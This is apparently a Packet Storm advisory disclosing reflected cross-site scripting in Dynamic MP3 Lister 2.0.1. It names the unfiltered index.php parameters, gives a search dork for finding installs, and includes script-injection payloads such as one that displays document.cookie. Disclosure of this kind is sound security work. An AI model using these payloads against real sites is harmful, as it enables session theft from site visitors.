dynamic MP3 lister version 2.0.1 suffers from a cross site scripting vulnerability.
df7b2506b62275b6860f38e092091a71a2c51b4aabc8c9b9941f025f8ecc8bef# Author : Xylitol
# Contact : n/a
# Vendor : benjamin kuz (www.ben.ursux.com)
# Version: 2.0.1
# D0rks : dynamic MP3 lister [2.0.1] by benjamin kuz :: netscape users [click here]
# Public release vulnz: 10/09/08
# Impact: low
# Stop lammer
Dynamic MP3 Lister 2.0.1
####################
1. Description:
####################
Dynamic MP3 Lister is a quick, easy way to share your web accessable MP3s.
Just drop in the folder with the MP3s and load the page.
This script will find and list them for you.
Other features include: Per directory image headers, Search capabilities,
MP3 streaming and MP3 information extraction for things such as
playtime, bitrate, frequency and channel type.
The list sorting order can be changed on the fly as well.
####################
2. Vulnerable page:
####################
index.php
bad filtered value : "currentpath" variable
bad filtered value : "invert" variable
bad filtered value : "search" variable
bad filtered value : "sort" variable
index.php?currentpath=[XSS]&sort=[XSS]&invert=[XSS]
index.php?sort=[XSS]&invert=[XSS]¤tpath=[XSS]&search=[XSS]
####################
3. PoC:
####################
"><script>alert(document.cookie)</script>
"><marquee><h1>xyl</h1></marquee>
"><script>alert(1337)</script>
dont forget the ">
####################
4. Greetings:
####################
Uber0n, Langy, code91, FullFreeze, meloulisi, t0fx
xssing, sla.ckers and security-sh3ll ppl
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed